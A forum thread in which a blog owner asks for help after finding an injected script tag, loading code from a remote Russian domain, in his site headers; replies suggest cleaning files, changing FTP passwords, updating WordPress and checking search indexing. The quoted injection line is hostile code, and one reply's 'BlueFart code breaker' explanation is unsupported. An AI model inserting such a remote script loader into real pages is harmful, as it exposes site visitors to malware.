16 {{ upvoteCount | shortNum }}
16 {{ upvoteCount | shortNum }}

hacked site/blog pages - help!

by CodrutTurcanu
14 replies
hi

my blog and web site pages
were infected with this script
in the header

<script src=http://dolarptc.hdd1.ru/login.php ></script>

do you have any idea how dangerous this is?

what do you advise?

Codrut.
#hacked #pages #site or blog
  • Profile picture of the author Mark Ford
    Hi
    Clean the infected files, or replace with a backup, and then change your passwords including ftp/sftp and also make sure your wordpress install is up to date.

    Thanks
    Mark
    {{ DiscussionBoard.errors[1507345].message }}
    • Profile picture of the author CodrutTurcanu
      why? what damage could it cause?
      {{ DiscussionBoard.errors[1507886].message }}
      • Profile picture of the author Mark Ford
        well- if you didn't put the code in there, you would have to assume it was malicious and not good and that your site had been compromised - so remove it, change the passwords
        {{ DiscussionBoard.errors[1508188].message }}
  • Profile picture of the author Abledragon
    You may also need to check that Google hasn't spotted it and de-indexed your site. You can do that through Google Webmasters Tools, including re-submitting your site once it's cleaned up.

    Once you're all cleaned up this article may help with improving your site's resistance to hacking in the future:

    http://www.wealthydragon.com/blog/20...-security-ftp/

    Cheers,

    Martin.
    Signature
    WealthyDragon - Earning My Living Online
    {{ DiscussionBoard.errors[1508258].message }}
    • Profile picture of the author CodrutTurcanu
      Originally Posted by Abledragon View Post

      You may also need to check that Google hasn't spotted it and de-indexed your site. You can do that through Google Webmasters Tools, including re-submitting your site once it's cleaned up.

      Once you're all cleaned up this article may help with improving your site's resistance to hacking in the future:

      http://www.wealthydragon.com/blog/20...-security-ftp/

      Cheers,

      Martin.

      Why? Is Google de-indexing hacked sites?
      {{ DiscussionBoard.errors[1509852].message }}
      • Profile picture of the author intoAM.com
        Originally Posted by CodrutTurcanu View Post

        Why? Is Google de-indexing hacked sites?
        They might add a warning to your SE listings or deindex your site for spamming (see: doorways) if the attacker's script redirects your visitors somewhere else (in the futurre).
        {{ DiscussionBoard.errors[1509864].message }}
  • Profile picture of the author oca101
    Banned
    [DELETED]
    {{ DiscussionBoard.errors[1509405].message }}
    • Profile picture of the author CodrutTurcanu
      Originally Posted by oca101 View Post

      just removing the inserted script will do the mess gone,
      <script src=http://dolarptc.hdd1.ru/login.php ></script> is BlueFart code breaker, use by affiliate program site.

      BlueFart code breaker? What is that, and how bad is it?
      {{ DiscussionBoard.errors[1509855].message }}
  • Profile picture of the author HomeComputerGames
    I would suggest thoroughly checking your personal computer for viruses also.
    There are key loggers and other programs with vulnerabilities. If you are downloading anything from torrents or cracked software you may want to beware.

    You don't happen to use filezilla for ftp do you?
    Signature

    yes, I am....

    {{ DiscussionBoard.errors[1509524].message }}
  • Profile picture of the author intoAM.com
    It leads to a 404 error page (the PHP file was not found at their server) even when I fake referer/useragent to pretend the request comes from a legitimate website and not from a security consulting service.

    But I would recommend you to remove the code immediately from your website and upgrade your WordPress installation to the latest version immediately as well.

    Not only you're risking potentially getting your visitors or yourself infected with any type of malware, but you're also risking yourself getting into problems because of misuse of your server resources by the hackers.
    {{ DiscussionBoard.errors[1509579].message }}
  • Profile picture of the author pritamsingh98
    just clean the infected files and change ftp password .....
    {{ DiscussionBoard.errors[1511223].message }}
  • Profile picture of the author andr3yu
    hello,you should delete that line infected and write again the script...from 0.I have same problem and i fix it with that solution.
    {{ DiscussionBoard.errors[1513859].message }}

Trending Topics